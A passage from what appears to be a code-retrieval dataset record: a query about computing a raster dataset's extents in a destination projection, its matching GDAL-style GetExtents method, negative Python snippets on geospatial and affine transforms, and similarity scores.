transform.estimate_transform(\"affine\",src,dst)\n data = self.stormData[0][:,0:2]\n data = affine(data)\n self.stormData[0][:,0:2] = data", "def _pixel_to_map(coordinates, geotransform):\n coordinates_map = np.empty(coordinates.shape)\n coordinates_map[..., 0] = (\n geotransform[0]\n + geotransform[1] * coordinates[..., 0]\n + geotransform[2] * coordinates[..., 1]\n )\n coordinates_map[..., 1] = (\n geotransform[3]\n + geotransform[4] * coordinates[..., 0]\n + geotransform[5] * coordinates[..., 1]\n )\n return coordinates_map", "def test_coords_transformation():\n\n # H+R+S+T, 
not reverse, depth\n img_meta = {\n 'pcd_scale_factor':\n 1.2311e+00,\n 'pcd_rotation': [[8.660254e-01, 0.5, 0], [-0.5, 8.660254e-01, 0],\n [0, 0, 1.0e+00]],\n 'pcd_trans': [1.111e-02, -8.88e-03, 0.0],\n 'pcd_horizontal_flip':\n True,\n 'transformation_3d_flow': ['HF', 'R', 'S', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, -2.9757e-01, 4.0021e+01],\n [-9.1435e-01, 2.6675e+01, -5.5950e+00],\n [2.0089e-01, 5.8098e+00, -3.5409e+01],\n [-1.9461e-01, 3.1309e+01, -1.0901e+00]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=False)\n\n expected_tensor = torch.tensor(\n [[5.78332345e+00, 2.900697e+00, 4.92698531e+01],\n [-1.5433839e+01, 2.8993850e+01, -6.8880045e+00],\n [-3.77929405e+00, 6.061661e+00, -4.35920199e+01],\n [-1.9053658e+01, 3.3491436e+01, -1.34202211e+00]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # H+R+S+T, reverse, depth\n img_meta = {\n 'pcd_scale_factor':\n 7.07106781e-01,\n 'pcd_rotation': [[7.07106781e-01, 7.07106781e-01, 0.0],\n [-7.07106781e-01, 7.07106781e-01, 0.0],\n [0.0, 0.0, 1.0e+00]],\n 'pcd_trans': [0.0, 0.0, 0.0],\n 'pcd_horizontal_flip':\n False,\n 'transformation_3d_flow': ['HF', 'R', 'S', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, -2.9757e-01, 4.0021e+01],\n [-9.1435e+01, 2.6675e+01, -5.5950e+00],\n [6.061661e+00, -0.0, -1.0e+02]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=True)\n\n expected_tensor = torch.tensor(\n [[-5.53977e+00, 4.94463e+00, 5.65982409e+01],\n [-6.476e+01, 1.1811e+02, -7.91252488e+00],\n [6.061661e+00, -6.061661e+00, -1.41421356e+02]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # H+R+S+T, not reverse, camera\n img_meta = {\n 'pcd_scale_factor':\n 1.0 / 7.07106781e-01,\n 'pcd_rotation': [[7.07106781e-01, 0.0, 7.07106781e-01],\n [0.0, 1.0e+00, 0.0],\n [-7.07106781e-01, 0.0, 7.07106781e-01]],\n 'pcd_trans': [1.0e+00, -1.0e+00, 0.0],\n 'pcd_horizontal_flip':\n True,\n 'transformation_3d_flow': ['HF', 'S', 'R', 'T']\n }\n\n pcd = torch.tensor([[-5.2422e+00, 4.0021e+01, -2.9757e-01],\n [-9.1435e+01, -5.5950e+00, 2.6675e+01],\n [6.061661e+00, -1.0e+02, -0.0]])\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'CAMERA', img_meta, reverse=False)\n\n expected_tensor = torch.tensor(\n [[6.53977e+00, 5.55982409e+01, 4.94463e+00],\n [6.576e+01, -8.91252488e+00, 1.1811e+02],\n [-5.061661e+00, -1.42421356e+02, -6.061661e+00]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V, reverse, camera\n img_meta = {'pcd_vertical_flip': True, 'transformation_3d_flow': ['VF']}\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'CAMERA', img_meta, reverse=True)\n\n expected_tensor = torch.tensor([[-5.2422e+00, 4.0021e+01, 2.9757e-01],\n [-9.1435e+01, -5.5950e+00, -2.6675e+01],\n [6.061661e+00, -1.0e+02, 0.0]])\n\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V+H, not reverse, depth\n img_meta = {\n 'pcd_vertical_flip': True,\n 'pcd_horizontal_flip': True,\n 'transformation_3d_flow': ['VF', 'HF']\n }\n\n pcd_transformed = apply_3d_transformation(\n pcd, 'DEPTH', img_meta, reverse=False)\n\n expected_tensor = torch.tensor([[5.2422e+00, -4.0021e+01, -2.9757e-01],\n [9.1435e+01, 5.5950e+00, 2.6675e+01],\n [-6.061661e+00, 1.0e+02, 0.0]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)\n\n # V+H, reverse, lidar\n img_meta = {\n 'pcd_vertical_flip': True,\n 'pcd_horizontal_flip': True,\n 'transformation_3d_flow': ['VF', 'HF']\n }\n\n pcd_transformed = apply_3d_transformation(\n 
pcd, 'LIDAR', img_meta, reverse=True)\n\n expected_tensor = torch.tensor([[5.2422e+00, -4.0021e+01, -2.9757e-01],\n [9.1435e+01, 5.5950e+00, 2.6675e+01],\n [-6.061661e+00, 1.0e+02, 0.0]])\n assert torch.allclose(expected_tensor, pcd_transformed, 1e-4)", "def transform(self, X):\n\n t0 = time.perf_counter()\n check_is_fitted(self)\n self.check_external_components_modified()#[WARN] in d3m, primitives can \"restore\" private class variables...\n X = self._validate_data(X, accept_sparse=[\"csr\", \"csc\"], reset=False)\n t1 = time.perf_counter()\n\n if X.shape[1] != self.components_af_.shape[1]:\n raise ValueError(\n \"Impossible to perform projection:\"\n \"X at fit stage had a different number of features. \"\n \"(%s != %s)\" % (X.shape[1], self.components_af_.shape[1])\n )\n\n #X_new = safe_sparse_dot(X, self.components_.T, dense_output=self.dense_output)\n #import pdb; pdb.set_trace()\n X_af = af.interop.from_ndarray(X).as_type(self.components_af_.dtype())\n X_new = af.matmulNT(X_af, self.components_af_)\n X_new = X_new.to_ndarray()\n t2 = time.perf_counter()\n return X_new", "def setCrsIsProjection(self):\n self.isgeographic = False", "def set_transform(self, tf):\n self.camera.SetTransform(tf)", "def transform(self, srid: ir.IntegerValue) -> GeoSpatialValue:\n return ops.GeoTransform(self, srid).to_expr()", "def _select_transform(self):\n for transform in self.transforms:\n if transform.applies is None or transform.applies(self.ti_dict) is True:\n self.transform = transform\n break\n else:\n raise RuntimeError('No transform found for TI data')", "def set_transform(self, transform):\n self._transform = transform", "def apply_transform(x,\n transform_matrix,\n channel_axis=0,\n fill_mode='nearest',\n cval=0.,\n interp_order=0):\n x = np.rollaxis(x, channel_axis, 0)\n final_affine_matrix = transform_matrix[:3, :3]\n final_offset = transform_matrix[:3, -1]\n channel_volumes = [ndi.interpolation.affine_transform(\n x_channel,\n final_affine_matrix,\n final_offset,\n order=interp_order, # NOTE: The order of the spline interpolation\n mode=fill_mode,\n cval=cval) for x_channel in x]\n x = np.stack(channel_volumes, axis=0)\n x = np.rollaxis(x, 0, channel_axis + 1)\n return x" ]
[ "0.6720557", "0.6548644", "0.6337521", "0.6230713", "0.62149775", "0.58759457", "0.58334744", "0.5782975", "0.5738817", "0.56981885", "0.5647636", "0.5635617", "0.5624577", "0.5602451", "0.55902624", "0.5584441", "0.5567373", "0.55569345", "0.55569345", "0.5550751", "0.552929", "0.54919827", "0.5490159", "0.54779094", "0.5475191", "0.5470257", "0.54520786", "0.54448014", "0.54384285", "0.5435653", "0.5430392", "0.5413855", "0.5407643", "0.53956044", "0.53721946", "0.5369844", "0.53660345", "0.53596693", "0.5338315", "0.53264916", "0.5308238", "0.53082347", "0.5279875", "0.5273014", "0.52558863", "0.52554613", "0.52545464", "0.5242427", "0.52370423", "0.52360666", "0.52293295", "0.5228455", "0.5212772", "0.5207434", "0.52031183", "0.5182809", "0.51702833", "0.51702833", "0.51702833", "0.5169828", "0.51623565", "0.5145855", "0.5145717", "0.5145486", "0.513241", "0.51280165", "0.51212513", "0.5119788", "0.5095306", "0.5093604", "0.5087195", "0.5083273", "0.5082387", "0.50799567", "0.5079166", "0.5069819", "0.5069819", "0.5069103", "0.5064534", "0.50637126", "0.5062107", "0.5060045", "0.5055635", "0.5045152", "0.5039407", "0.50366175", "0.5021306", "0.50170046", "0.50162876", "0.50110936", "0.50040156", "0.49997258", "0.4996688", "0.49913839", "0.49875358", "0.49870628", "0.49853915", "0.49759674", "0.4974922", "0.49618715" ]
0.5615591
13
Returns (lowerleft, upperright) extents in transform's destination projection. If transform is None, no reprojection occurs and the dataset's SpatialReference is used.
def GetExtents(self, transform=None): # Prepare GDAL functions to compute extents x_size, y_size = self.RasterXSize, self.RasterYSize # Compute four corners in destination projection upper_left = self.PixelCoordinates(0, 0, transform=transform) upper_right = self.PixelCoordinates(x_size, 0, transform=transform) lower_left = self.PixelCoordinates(0, y_size, transform=transform) lower_right = self.PixelCoordinates(x_size, y_size, transform=transform) x_values, y_values = list(zip(upper_left, upper_right, lower_left, lower_right)) # Return lower-left and upper-right extents return Extents(lower_left=XY(min(x_values), min(y_values)), upper_right=XY(max(x_values), max(y_values)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extent(self):\n left = self.transform[0]\n right = left + self.transform[1] * self.shape[1]\n top = self.transform[3]\n bottom = top + self.transform[5] * self.shape[0]\n return left, right, bottom, top", "def extent(self):\n if self.x is not None:\n if self.y is not None:\n if self.z is not None:\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max(),\n self.z.min(), self.z.max())\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max())\n return (self.x.min(), self.x.max())\n\n elif self.r is not None and self.t is not None:\n if self.z is not None:\n return (self.z.min(), self.z.max(),\n self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n return (self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n\n return ()", "def get_extent(self):\n geot = self.geotransform()\n return (geot[0], geot[3] + self.YSize() * geot[5],\n geot[0] + self.XSize() * geot[1], geot[3])", "def get_extent_from_dataset(ds):\n\n transform = ds.GetGeoTransform()\n rows = ds.RasterYSize\n cols = ds.RasterXSize\n\n west = transform[0]\n ewres = transform[1]\n north = transform[3]\n nsres = transform[5]\n\n south = north + (rows * nsres)\n east = west + (cols * ewres)\n\n # print(\"crs\", ds.GetProjection())\n # print(\"cols\", cols)\n # print(\"north\", north)\n # print(\"south\", south)\n # print(\"west\", west)\n # print(\"east\", east)\n # print(\"ewres\", ewres)\n # print(\"nsres\", nsres)\n\n extent = SpatialExtent(top=north, bottom=south, left=west,\n right=east, width=abs(ewres), height=abs(nsres))\n\n return extent", "def extent(self):\n rx0 = gxapi.float_ref()\n ry0 = gxapi.float_ref()\n rz0 = gxapi.float_ref()\n rx1 = gxapi.float_ref()\n ry1 = gxapi.float_ref()\n rz1 = gxapi.float_ref()\n self.gxvox.get_area(rx0, ry0, rz0, rx1, ry1, rz1)\n if self.is_depth:\n return gxgm.Point2(((rx0.value, ry0.value, -rz1.value), (rx1.value, ry1.value, -rz0.value)))\n return gxgm.Point2(((rx0.value, ry0.value, rz0.value), (rx1.value, ry1.value, rz1.value)),\n self.coordinate_system)", "def geotransform(self):\n return self.dataset.GetGeoTransform() if self.dataset else None", "def GetTmsExtents(self, resolution=None, transform=None):\n if resolution is None:\n resolution = self.GetNativeResolution(transform=transform)\n\n # Get the tile dimensions in map units\n if transform is None:\n spatial_ref = self.GetSpatialReference()\n else:\n spatial_ref = transform.dst_ref\n\n tile_width, tile_height = spatial_ref.GetTileDimensions(\n resolution=resolution\n )\n\n # Validate that the native resolution extents are tile-aligned.\n extents = self.GetTiledExtents(transform=transform)\n pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution)\n if not extents.almost_equal(self.GetExtents(transform=transform),\n delta=min(*pixel_sizes)):\n raise UnalignedInputError('Dataset is not aligned to TMS grid')\n\n # Correct for origin, because you can't do modular arithmetic on\n # half-tiles.\n left, bottom = spatial_ref.OffsetPoint(*extents.lower_left)\n right, top = spatial_ref.OffsetPoint(*extents.upper_right)\n\n # Divide by number of tiles\n return Extents(lower_left=XY(int(round(left / tile_width)),\n int(round(bottom / tile_height))),\n upper_right=XY(int(round(right / tile_width)),\n int(round(top / tile_height))))", "def get_extents(self, view, ranges):\n ndims = len(view.dimensions())\n num = 6 if self.projection == '3d' else 4\n if self.apply_ranges:\n if ranges:\n dims = view.dimensions()\n x0, x1 = ranges[dims[0].name]\n if ndims > 1:\n y0, y1 = ranges[dims[1].name]\n else:\n 
y0, y1 = (np.NaN, np.NaN)\n if self.projection == '3d':\n if len(dims) > 2:\n z0, z1 = ranges[dims[2].name]\n else:\n z0, z1 = np.NaN, np.NaN\n else:\n x0, x1 = view.range(0)\n y0, y1 = view.range(1) if ndims > 1 else (np.NaN, np.NaN)\n if self.projection == '3d':\n z0, z1 = view.range(2)\n if self.projection == '3d':\n range_extents = (x0, y0, z0, x1, y1, z1)\n else:\n range_extents = (x0, y0, x1, y1)\n else:\n range_extents = (np.NaN,) * num\n\n if self.apply_extents:\n norm_opts = self.lookup_options(view, 'norm').options\n if norm_opts.get('framewise', False) or self.dynamic:\n extents = view.extents\n else:\n extent_list = self.hmap.traverse(lambda x: x.extents, [Element])\n extents = util.max_extents(extent_list, self.projection == '3d')\n else:\n extents = (np.NaN,) * num\n return tuple(l1 if l2 is None or not np.isfinite(l2) else\n l2 for l1, l2 in zip(range_extents, extents))", "def get_extent(self):\n pass", "def get_extent(ds):\n\n #\n # Check if latitude and longitude are stored as coordinates.\n #\n if 'lon' in ds.coords and 'lat' in ds.coords:\n return BoundingBox(\n left=ds.lon.values.min(),\n bottom=ds.lat.values.min(),\n right=ds.lon.values.max(),\n top=ds.lat.values.max()\n )\n\n #\n # Otherwise, get extent from projection information\n # by projecting the corner coordinates onto EPSG:4326\n # to obtain the latitude and longitude at the four corners.\n #\n src_crs = get_crs(ds)\n if src_crs is None:\n raise CRSError('Could not determine the CRS.')\n\n dst_crs = CRS(init='epsg:4326')\n proj_bounds = get_bounds(ds)\n bounds = rasterio.warp.transform_bounds(\n src_crs, dst_crs, **proj_bounds._asdict()\n )\n return BoundingBox(*bounds)", "def extent(self):\n\n x = np.array([0, self.nx]) * self.dx + self.corner_grid.x0\n ypoint = [0, self.ny] if self.origin == 'lower-left' else [self.ny, 0]\n y = np.array(ypoint) * self.dy + self.corner_grid.y0\n\n return [x[0], x[1], y[0], y[1]]", "def extent_in_crs(self, crs=wgs84):\n\n # this is not so trivial\n # for optimisation we will transform the boundaries only\n poly = self.extent_as_polygon(crs=crs)\n _i, _j = poly.exterior.xy\n return [np.min(_i), np.max(_i), np.min(_j), np.max(_j)]", "def get_data_extent(self):\n xs, ys = self.xs, self.ys\n xmin, xmax = min(xs), max(xs)\n ymin, ymax = min(xy), max(ys)\n w = maxx - minx\n h = maxy - miny\n return xmin, ymax, w, h", "def extents(self):\n x0, y0, width, height = self._rect_bbox\n xmin, xmax = sorted([x0, x0 + width])\n ymin, ymax = sorted([y0, y0 + height])\n return xmin, xmax, ymin, ymax", "def _getGeoTransform(self):\n with self._getDatasetLock:\n gt = self.dataset.GetGeoTransform()\n if (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()):\n gt = gdal.GCPsToGeoTransform(self.dataset.GetGCPs())\n return gt", "def extent(self) -> Tuple[float]:\n ext = (\n min(self.putin.geometry.x, self.takeout.geometry.x),\n min(self.putin.geometry.y, self.takeout.geometry.y),\n max(self.putin.geometry.x, self.takeout.geometry.x),\n max(self.putin.geometry.y, self.takeout.geometry.y),\n )\n return ext", "def extent(self):\n ulx, uly, lrx, lry = self.ul_lr\n return ulx, lry, lrx, uly", "def extents(self):\n\n return self._local", "def extent_from_metadata(meta):\n\n meta = find_meta_branch(meta, 'geosoft')\n if meta:\n cs = coordinate_system_from_metadata(meta)\n try:\n ex = meta['geosoft']['dataset']['georeference']['dataextents']['extent3d']\n minp = gxgm.Point((float(ex['@minx']), float(ex['@miny']), float(ex['@minz'])))\n maxp = gxgm.Point((float(ex['@maxx']), float(ex['@maxy']), 
float(ex['@maxz'])))\n return gxgm.Point2((minp, maxp), cs)\n\n except KeyError:\n pass\n\n return None", "def get_geographic_extent(self, project):\n if project.geographic_extent is not None:\n return json.loads(project.geographic_extent.json)\n else:\n return None", "def get_raster_extent(dataset, geo=False, window=True):\n\n x_size = dataset.RasterXSize\n y_size = dataset.RasterYSize\n geotrans = dataset.GetGeoTransform()\n xmin = geotrans[0]\n ymax = geotrans[3]\n xmax = geotrans[0] + geotrans[1] * x_size\n ymin = geotrans[3] + geotrans[5] * y_size\n\n extent = np.array([[xmin, ymax], [xmin, ymin], [xmax, ymin], [xmax, ymax]])\n\n if geo:\n projection = read_gdal_projection(dataset)\n extent = georef.reproject(extent, projection_source=projection)\n\n if window:\n x = extent[:, 0]\n y = extent[:, 1]\n extent = np.array([x.min(), x.max(), y.min(), y.max()])\n\n return extent", "def getExtent(self):\n extent = self.parent.biomeGeometry.extent\n return extent", "def extent(self):\n return self._extent", "def get_data_extent(self):\n \n x, y = self.xy[0], self.xy[1]\n w, h = self.radius, self.radius\n return x-w, y+w, w, h", "def extents(self):\n if self.direction == 'horizontal':\n vmin = self._selection_artist.get_x()\n vmax = vmin + self._selection_artist.get_width()\n else:\n vmin = self._selection_artist.get_y()\n vmax = vmin + self._selection_artist.get_height()\n return vmin, vmax", "def get_data_extent(self):\n x, y = self.xy[0], self.xy[1]\n w, h = self.width, self.height\n return x, y, w, h", "def transform_bounds(\n self, dst_crs: CRS | int | str | dict, densify_pts: int = 21\n ) -> tuple[float, float, float, float]:\n if self.crs != dst_crs:\n bounds = rasterio.warp.transform_bounds(\n self.crs, dst_crs, *self.bounds, densify_pts=densify_pts\n )\n else:\n bounds = self.bounds\n return bounds", "def extent(self, start=None, finish=None):\n start, finish = self.bounds(start, finish)\n try:\n return finish - start + 1\n except TypeError:\n return None", "def bounds(self) -> tuple[float, float, float, float]:\n transform = self.transform\n a, b, c, d, e, f, _, _, _ = transform\n if b == d == 0:\n xs = (c, c + a * self.width)\n ys = (f, f + e * self.height)\n else: # rotated\n c0x, c0y = c, f\n c1x, c1y = transform * (0, self.height)\n c2x, c2y = transform * (self.width, self.height)\n c3x, c3y = transform * (self.width, 0)\n xs = (c0x, c1x, c2x, c3x)\n ys = (c0y, c1y, c2y, c3y)\n return min(xs), min(ys), max(xs), max(ys)", "def _reproject(ds, dst_crs=None, dst_transform=None, width=None, height=None,\n res=None, extent=None, **kwargs):\n\n if 'resampling' not in kwargs:\n kwargs['resampling'] = rasterio.warp.Resampling.cubic\n\n src_crs = get_crs(ds)\n src_bounds = get_bounds(ds)\n if extent is not None:\n extent = BoundingBox(*extent)\n\n #\n # Only allow inferring of width or height from aspect ratio\n # if the CRS is not changed.\n #\n if dst_crs is None:\n dst_crs = src_crs\n if width is None and height is not None:\n width = int(ncols(ds) * height / nrows(ds))\n elif height is None and width is not None:\n height = int(nrows(ds) * width / ncols(ds))\n\n # Given: transform, shape\n # Given: transform, extent\n # Given: res, extent\n # Given: shape, res\n # Given: shape, extent\n\n if dst_transform is not None:\n #\n # If the transform is given, we also need the width and height or\n # the extent.\n #\n if width is not None and height is not None:\n pass\n elif extent is not None:\n # Calculate width and height from extent\n width = int(abs(\n (extent.right - extent.left) / 
dst_transform.a)) + 1\n height = int(abs(\n (extent.top - extent.bottom) / dst_transform.e)) + 1\n else:\n raise ValueError('Not enough information provided.')\n\n elif extent is not None:\n #\n # Transform can be calculated from extent, if either width and height\n # or the resolution are given.\n #\n if res is not None:\n width = int(abs(\n (extent.right - extent.left) / res[0])) + 1\n height = int(abs(\n (extent.top - extent.bottom) / res[1])) + 1\n\n # The following doesn't give the correct result.\n dst_transform = rasterio.transform.from_bounds(\n *extent, width=width-1, height=height-1\n )\n\n else:\n #\n # If neither the transform nor the extent are given, infer the best\n # possible parameters from the width, height, and the resolution.\n #\n dst_transform, width, height = \\\n rasterio.warp.calculate_default_transform(\n src_crs, dst_crs,\n ncols(ds), nrows(ds),\n resolution=res,\n dst_width=width,\n dst_height=height,\n **src_bounds._asdict())\n\n src_transform = get_transform(ds)\n src_dims = get_dims(ds)\n dst_crs = _parse_crs(dst_crs)\n\n #\n # Prepare new x and y coordinate arrays\n #\n dst_x, _ = dst_transform * (np.arange(width), np.zeros(width, dtype=int))\n _, dst_y = dst_transform * (np.zeros(height, dtype=int), np.arange(height))\n dst_coords = {'x': dst_x, 'y': dst_y}\n\n #\n # Handle the case where there are extra dimensions, e.g. 'time'\n # or 'band'\n #\n extra_dims = src_dims.keys() - {'y', 'x'}\n if len(extra_dims) == 0:\n dst_shape = (height, width)\n dst_dims = ('y', 'x')\n elif len(extra_dims) == 1:\n extra_dim = extra_dims.pop()\n dst_shape = (src_dims[extra_dim], height, width)\n dst_dims = (extra_dim, 'y', 'x')\n dst_coords[extra_dim] = ds.coords[extra_dim]\n else:\n raise ValueError('More than three dimensions are not supported.')\n\n def _reproject_da(da, shape):\n #\n # Reproject a single data array\n #\n extra_dims = set(da.dims) - {'y', 'x'}\n dim_order = tuple(extra_dims) + ('y', 'x')\n values = da.transpose(*dim_order).values\n output = np.zeros(shape, dtype=da.dtype)\n output[:] = np.nan\n\n # Fix data shape for one-dimensional data\n if da.ndim == 1:\n #\n # NOTE: The stretch factor is necessary because the input data\n # must extend at least half an original resolution cell in the\n # independent dimension.\n #\n if da.dims == ('x',):\n stretch_x = int((~src_transform * dst_transform).a / 2 + 1)\n values = np.vstack([values] * stretch_x)\n output.shape = (1,) + output.shape\n elif da.dims == ('y',):\n stretch_y = int((~src_transform * dst_transform).e / 2 + 1)\n values = np.vstack([values] * stretch_y).T\n output.shape = output.shape + (1,)\n\n rasterio.warp.reproject(\n values,\n output,\n src_transform=src_transform,\n src_crs=src_crs,\n dst_transform=dst_transform,\n dst_crs=dst_crs,\n dst_nodata=np.nan,\n **kwargs\n )\n\n # Final reshape in case the input was one-dimensional\n return output.reshape(shape)\n\n if isinstance(ds, xr.Dataset):\n result = xr.Dataset(coords=dst_coords)\n\n #\n # Also reproject coordinate arrays that are defined over\n # x and y\n #\n for v in ds.coords:\n #\n # If the projection is the same, also reproject coordinate arrays\n # that are defined over only one variable.\n #\n if dst_crs == src_crs and v not in ds.dims:\n if ds.coords[v].dims == ('x',):\n result.coords[v] = \\\n (('x',), _reproject_da(ds.coords[v], (width,)))\n elif ds.coords[v].dims == ('y',):\n result.coords[v] = \\\n (('y',), _reproject_da(ds.coords[v], (height,)))\n\n if not set(ds.coords[v].dims).issuperset({'x', 'y'}):\n continue\n\n shape = 
(height, width)\n result.coords[v] = (('y', 'x'),\n _reproject_da(ds.coords[v], shape))\n\n #\n # Reproject the actual data\n #\n for v in ds.data_vars:\n if set(ds[v].dims) == set(dst_dims):\n result[v] = (dst_dims, _reproject_da(ds[v], dst_shape))\n elif set(ds[v].dims) == {'y', 'x'}:\n shape = (height, width)\n result[v] = (dst_dims, _reproject_da(ds[v], shape))\n else:\n result[v] = (ds[v].dims, ds[v])\n\n #\n # Create lat and lon coordinates\n #\n # if 'lat' in ds.coords and 'lon' in ds.coords:\n # lon, lat = rasterio.warp.transform(\n # src_crs, dst_crs, ds.coords['x'], ds.coords['y'])\n # result.coords['lon'] = (('x',), lon)\n # result.coords['lat'] = (('y',), lat)\n\n elif isinstance(ds, xr.DataArray):\n result = xr.DataArray(_reproject_da(ds, dst_shape), dims=dst_dims,\n coords=dst_coords, name=ds.name)\n\n result.attrs = ds.attrs\n\n # Serialize transform to tuple and store in metadata\n result.attrs['transform'] = dst_transform[:6]\n # Store CRS info in metadata\n result.attrs['crs'] = dst_crs.to_string()\n result.attrs['coordinate_system_string'] = dst_crs.wkt\n # Store new data shape in metadata\n result.attrs['lines'] = nrows(result)\n result.attrs['samples'] = ncols(result)\n\n _add_latlon(result)\n\n return result", "def GetExtent(vDataSet):\r\n return [vDataSet.GetExtendMinX(),vDataSet.GetExtendMaxX(),\r\n vDataSet.GetExtendMinY(),vDataSet.GetExtendMaxY(),\r\n vDataSet.GetExtendMinZ(),vDataSet.GetExtendMaxZ()]", "def GetExtent(ds):\n xmin, xpixel, _, ymax, _, ypixel = ds.GetGeoTransform()\n width, height = ds.RasterXSize, ds.RasterYSize\n xmax = xmin + width * xpixel\n ymin = ymax + height * ypixel\n\n return (xmin, ymax), (xmax, ymax), (xmax, ymin), (xmin, ymin)", "def extent(self):\n return self.index.max() - self.index.min(), self.columns.max() - self.columns.min()", "def extent_to_gdal_transform(extent):\n\n # extent = SpatialExtent()\n\n pixel_height = math.copysign(extent.height, extent.bottom - extent.top)\n pixel_width = math.copysign(extent.width, extent.right - extent.left)\n\n transform = [extent.top, pixel_width, 0, extent.left, 0, pixel_height]\n return transform", "def extents(nodes):\n from numpy import min, max\n return ( min(nodes[:,0]), max(nodes[:,0]),\n min(nodes[:,1]), max(nodes[:,1]),\n min(nodes[:,2]), max(nodes[:,2]) )", "def extents(self):\n self._updateExtents()\n return self.mExtents", "def get_data_extent(self):\n raise NotImplementedError, \"Derived must override\"", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def geoextent(self):\r\n return self.series_extent", "def return_extents(self):\n\n return [qm.tree.mins, qm.tree.maxs]", "def extent(self):\n return np.array(self._extent)", "def extent(self):\n return self._ax.extent", "def dataPointExtent(dataset):\n ext = tuple(np.flip(dataset.GetDimensions()))\n return ext", "def geotransform(self):\n return self._geotransform", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def GetNativeResolution(self, transform=None, maximum=None):\n # Get the source projection's units for a 1x1 pixel, assuming square\n # pixels.\n width, height = self.GetPixelDimensions()\n src_pixel_size = min(abs(width), abs(height))\n\n if transform is None:\n dst_pixel_size = src_pixel_size\n dst_ref = self.GetSpatialReference()\n else:\n # Transform these dimensions into the destination projection\n 
dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0]\n dst_pixel_size = abs(dst_pixel_size)\n dst_ref = transform.dst_ref\n\n # We allow some floating point error between src_pixel_size and\n # dst_pixel_size based on the major circumference so that the error is\n # in the destination units\n error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128\n\n # Find the resolution where the pixels are smaller than dst_pixel_size.\n for resolution in count():\n if maximum is not None and resolution >= maximum:\n return resolution\n\n res_pixel_size = max(\n *dst_ref.GetPixelDimensions(resolution=resolution)\n )\n if (res_pixel_size - dst_pixel_size) <= error:\n return resolution\n\n # Halve error each resolution\n error /= 2", "def get_common_extent(datasets):\n common_bounds = get_common_bounds(datasets)\n common_crs = get_crs(datasets[0])\n dst_crs = CRS(init='epsg:4326')\n extent = rasterio.warp.transform_bounds(\n common_crs, dst_crs, **common_bounds._asdict()\n )\n return BoundingBox(*extent)", "def getCurrentExtent(self):\n if not self.currentBox:\n extent = None\n else:\n extent = boxToExtent(self.currentBox)\n return extent", "def extent(self):\r\n if not hasattr(self, '_extent'):\r\n self._extent = conf.lib.clang_getCursorExtent(self)\r\n\r\n return self._extent", "def Extrema(self):\n ymin = np.min(self._corners[:, 1])\n xmin = np.min(self._corners[:, 0])\n ymax = np.max(self._corners[:, 1])\n xmax = np.max(self._corners[:, 0])\n return ymin, xmin, ymax, xmax", "def bounding_box(self):\n frames = self.available_frames\n transform_0 = self.get_transform(frames[0], frames[1])\n try:\n bb = transform_0.bounding_box\n except NotImplementedError:\n return None\n if transform_0.n_inputs == 1:\n return bb\n try:\n axes_order = self.input_frame.axes_order\n except AttributeError:\n axes_order = np.arange(transform_0.n_inputs)\n # Model.bounding_box is in python order, need to reverse it first.\n return tuple(bb[::-1][i] for i in axes_order)", "def major_extent(self) -> complex:\n return max((self.max() - self.null, self.null - self.min()))", "def get_bounds(self):\n bottom_right = np.asarray([self.coords[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def check_extent(self):\n if self.lower_left.x > self.upper_right.x:\n dlx = self.lower_left.x\n self.lower_left.x = self.upper_right.x\n self.upper_right.y = dlx\n\n if self.lower_left.y > self.upper_right.y:\n dly = self.lower_left.y\n self.lower_left.y = self.upper_right.y\n self.upper_right.y = dly", "def get_extent(georef, shape):\n extent = (\n georef[0],\n georef[3] +\n shape[1] *\n georef[5],\n georef[0] +\n shape[0] *\n georef[1],\n georef[3]) # x1,y1,x2,y2\n return extent", "def get_extent(fpath):\n extents = []\n with h5py.File(fpath, mode='r') as f:\n for key, value in f['label/label-0'].attrs.items():\n if key.lower().endswith('extent') and isinstance(value, np.ndarray):\n extents.append(value)\n \n extents = np.stack(extents, axis=0)\n maxs = np.max(extents, axis=0)\n mins = np.min(extents, axis=0)\n axis_slices = []\n for min_, max_ in zip(mins[::2], maxs[1::2]):\n axis_slices.append(slice(min_, max_, 1))\n return tuple(axis_slices)", "def extent(self) -> typing.Tuple[str, ...]:\n return self._extent.members()", "def bbox(self):\n return np.array(self.path.get_extents()).ravel(order='F')", "def fetchbounds(self):\n pnts = [x for x in [self.out_start, self.start, self.in_start, \\\n self.in_end, self.end, self.out_end] \\\n if 
